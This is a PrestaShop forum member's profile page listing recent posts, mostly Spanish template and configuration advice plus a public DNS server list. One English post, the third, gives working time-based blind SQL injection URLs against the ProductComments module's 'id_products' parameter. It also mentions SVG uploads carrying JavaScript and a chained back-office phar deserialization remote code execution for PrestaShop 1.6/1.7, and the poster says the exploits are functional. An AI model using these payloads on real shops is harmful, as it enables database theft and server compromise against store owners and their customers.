Jump to content

tamu secreto

Members
  • Posts

    1,135
  • Joined

  • Last visited

  • Days Won

    3

tamu secreto last won the day on June 20 2019

tamu secreto had the most liked content!

Profile Information

  • Activity
    Agency

Recent Profile Visitors

12,258,012 profile views

tamu secreto's Achievements

  1. Hola, Pues veamos, una opinión y solo es mi opinión! 🙄 PrestaShop un sistema de gestión de contenidos orientado a crear tiendas en llíneas toda su base está pensada para ello (supongamos esto...), puede usarse como multi tiendas, para el caso de empresas. No esta pensado para ser multi-vendor, y aún cuando pueda aplicarse algún parche o modulo, su base no está pensada para ello (supongamos 🙄...). Hay algúnos open sources para multivendor, por ejemplo cocorico, aimeos, etc...pero sucede que usan Laravel , symfony, etc. y en algunos casos bastante desactualizados, complejos de instalar, poca documentacion, y rara vez se pueden hacer funcionar correctamente.. En fin como estoy bastante loco! 😵 me propuse hacer el mio propio 😁, y no tiene que pagar vava a ser gratuito y de código abiertolo. comence hace dos semanas, solo puedo dedicarle algunas horas por dia (trabajo jajaja 🤫), lo hago por didiversión. Le dedique cuatro dias y avance bastante. [ avances ] Como no quería escribir categorías 😆 y me use el api de mercado libre, genere un script que genera todas las categorias y las almacena DB. ver generador categorias por api (parece aburrio al principio, pero habiliten el sonido se pone interesante apartir del minuto dos 😁 El jueves de esta semana, hasta el sabado voy estar con esto, espero abanzar hasta el install. Como solo puedo dedicarle poco tiempo, tengo para tres a cuatro meses de desarrollo. En fin, como esto no tiene ralación con prestashop 😇, el hilo se sigue por mensaje privado 😒 saludos!! saludos!!
  2. 😝 reviviendo este post viejo, pero es como un desafio jajaja, pero ma que modulo me hago un mvc propio, creo que puedo hacerlo, solo seria cuestion de ver como competir con otros existenetes, pero en fin... 😋 que desafio mi propio mercado libre o ebay !!
  3. SQL Injection Parameter: id_product utility charger : 1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt) example: http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt) ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=[SQL] Example: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2))) Cross-Site Request Forgery The file manager, which allows the following files to be uploaded. jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma, flv, webm The SVG file upload can contain Javascript code. Remote Code Execution Vulnerable Package Link: https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip Apli: PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x - Back Office Remote Code Execution Chaining multiple vulnerabilities to trigger deserialization via phar back-office-url email password func param. The values were changed, to a good understanding few words. The exploits are functional !!🙄 greetings luck !😇
  4. 🤨 y por que posteo la direccion de directorio admin en un foro concurrido... de todos modos siempre se puede establecer la estructura de directorio utilizando alguna distro pero es en ocasiones trabajoso y se supone que de eso se trata de hacerlo tan facil para los pillos RENOMBRE SU DIRECTORIO ADMIN O EDITE SU PRIMER POST, si es que le preocupa la seguridad. saludos
  5. La mejor opción sería utilizar un modulo que haga hook displayAfterProductThumbs (si mal no recuerdo) para que el video no se cargue en moviles se puede usar varios recursos, por ejemplo al instalar el modulo crear su configuracion como no disponible en moviles, otra opción seria configuar el modulo desde prestashop una vez instalado para que no se visualice en moviles y la mas rebuscada seria incorporar codigo php o smarty utilizando una funcion que tome de la classe tools el navegador o movil y tomar una accion para el caso de if o else :) Con relación a utilizar iframe No es recomendable, ya que en una tienda se suele buscar ese tipo contenido para robo se sesiones y demas cosas que hacen la gente mala :D Parece complicado pero no lo es, puede buscar en le foro un modulo gratuito que he subido hace tiempo que inserta video en productos utilizando fancy. Es para versiones anteriores de prestashop pero vera que no es dificil adaptarlo, solo debera cambiar los hooks y la funcion de carga de tpl. saludos
  6. 😯 doscientos euros! yo puedo hacer uno asi por cincuenta euros 😆
  7. Level3 – 209.244.0.3 y 209.244.0.4 IBM Quad9 – 9.9.9.9 Verisign – 64.6.64.6 y 64.6.65.6 Google – 8.8.8.8 y 8.8.4.4 WATCH – 84.200.69.80 y 84.200.70.40 Comodo Secure DNS – 8.26.56.26 y 8.20.247.20 OpenDNS Home – 208.67.222.222 y 208.67.220.220 DNS Advantage – 156.154.70.1 y 156.154.71.1 Norton ConnectSafe – 199.85.126.10 y 199.85.127.10 GreenTeamDNS – 81.218.119.11 y 209.88.198.133 SafeDNS – 195.46.39.39 y 195.46.39.40 OpenNIC – 96.90.175.167 y 193.183.98.154 SmartViper – 208.76.50.50 y 208.76.51.51 Dyn – 216.146.35.35 y 216.146.36.36 FreeDNS – 37.235.1.174 y 37.235.1.177 Alternate DNS – 198.101.242.72 y 23.253.163.53 DNS – 77.88.8.8 y 77.88.8.1 UncensoredDNS – 91.239.100.100 y 89.233.43.71 Hurricane Electric – 74.82.42.42 FoolDNS – 87.118.111.215 y 213.187.11.67 puntCAT – 109.69.8.51 Cloudflare 1.1.1.1 y 1.0.0.1 ( Cloudflare Afirma que es el más rápido y más privado que existe) tools interesantes: https://code.google.com/archive/p/namebench/downloads https://www.malavida.com/es/soft/dns-jumper/ de todos modos no creo que lo del backoffice lento tenga que ver con DNS 😩 habria que ver que es lo que estas usando y como lo has configurado...
  8. Bien!!! lo mas rapido seria adicionar el style directamente es mas rapido de explicar <textarea style="background:#FFF;" rows="2" cols="120" id="delivery_message" name="delivery_message"> salu2!
  9. Pues obviamente si no desea mostrar el contenido por defecto tiene que comentar No elmine nada simplemente envuelva el codigo que no quiere imprimir con {* aca el codigo que no quiero mostrar *} todo lo que este dentro de {* *} no se mostrara. es recomendable no eliminar nada. saludos
  10. creo que si edita el archivo category.tpl del theme en cuestions, usando {* *} para no mostrar lo que no quiere. en su caso si quiere ocultar el nombre de abajo: prestashop 1.6.x {* <h1 class="page-heading{if (isset($subcategories) && !$products) || (isset($subcategories) && $products) || !isset($subcategories) && $products} product-listing{/if}"><span class="cat-name">{$category->name|escape:'html':'UTF-8'}{if isset($categoryNameComplement)}&nbsp;{$categoryNameComplement|escape:'html':'UTF-8'}{/if}</span>{include file="$tpl_dir./category-count.tpl"}</h1> *} en prestashop 1.7 {* <div class="text-sm-center hidden-md-up"> <h1 class="h1">{$category.name}</h1> </div> *}
  11. pues por lo que veo tampoco esta alli lo que desea Vemos casi al final del archivo que usted ha subido he allado esto: {include file="$tpl_dir./sub/product_info/default.tpl"} por lo que entiendo su theme posee un directorio sub/product_info busque alli el archivo defualt.tpl seguro encontrara algo asi: <div class="ALGUN_ESTILO_NI_IDEA">{$product->description}</div> Simplemente utilice esa linea de codigo para insertarla donde desee, por ejemplo usando el archivo product.tpl que ha subido vamos colocar la descripcion larga en teoria debajo del boton comprar: <div class="box-cart-bottom"> <div {if (!$allow_oosp && $product->quantity <= 0) || !$product->available_for_order || (isset($restricted_country_mode) && $restricted_country_mode) || $PS_CATALOG_MODE} class="unvisible"{/if}> <p id="add_to_cart" class="buttons_bottom_block no-print"> <button type="submit" name="Submit" class="exclusive btn btn-outline-inverse status-enable"> <span>{if $content_only && (isset($product->customization_required) && $product->customization_required)}{l s='Customize'}{else}{l s='Add to cart'}{/if}</span> </button> </p> </div> {if isset($product->description)} <div class="ALGUN_ESTILO_DE_SU_THEME">{$product->description}</div> {/if} </div> <!-- end box-cart-bottom --> use if isset para que solo se muestre el contenido si ha sido enviado, en fin no hay mucho secreto solo tiene que colocar el fragmento siguiente donde desee: {if isset($product->description)} <div class="algun_estilo_de_theme">{$product->description}</div> {/if} algun_estilo_de_su_theme es un ejemplo usted utilice la linea de codigo tal cual esta en su archivo tpl. saludos
  12. Busque en el archivo order-carrier.tpl de su theme <textarea class="form-control" cols="120" rows="2" name="message" id="message"> cambie el valor 120 de cols por uno menor hasta que se ajuste a sus necesidades ejemplo: <textarea class="form-control" cols="100" rows="2" name="message" id="message"> saludos!
  13. La paginas prestashop utilizan un id name puede utilizar esta variable para capturar la pagina y jugar con eso por ejemplo edite el archivo tpl que desea y en el campo dni o o el que quiera agregue algo asi: <input type="text" {if $page_name == 'NOMBRE_DE_LA_PAGINA'} required {/if}> es un camino... otro ejemplo y mas razonable seria: <input type="text" {if isset($page_name) and $page_name == 'NOMBRE_PAGINA'} required {/if}> NOTA: para ver el nombre de la pagina en cuestion haga puede hacer esto: ingrese a la pagina donde aparece el formulario, haga clic boton derecho ver codigo fuente y observe el valor que se encuentra en: <body id='ACA APARECE EL NOMBRE'.... copie el nombre y pruebe con los ejemplos dados, obvio en los tpl correspondientes.. saludos
  14. ha probado con forzar compilacion. otro punto es que no se que version de prestashop esta utilizando y que archivo a modificado.. saludos
×
×
  • Create New...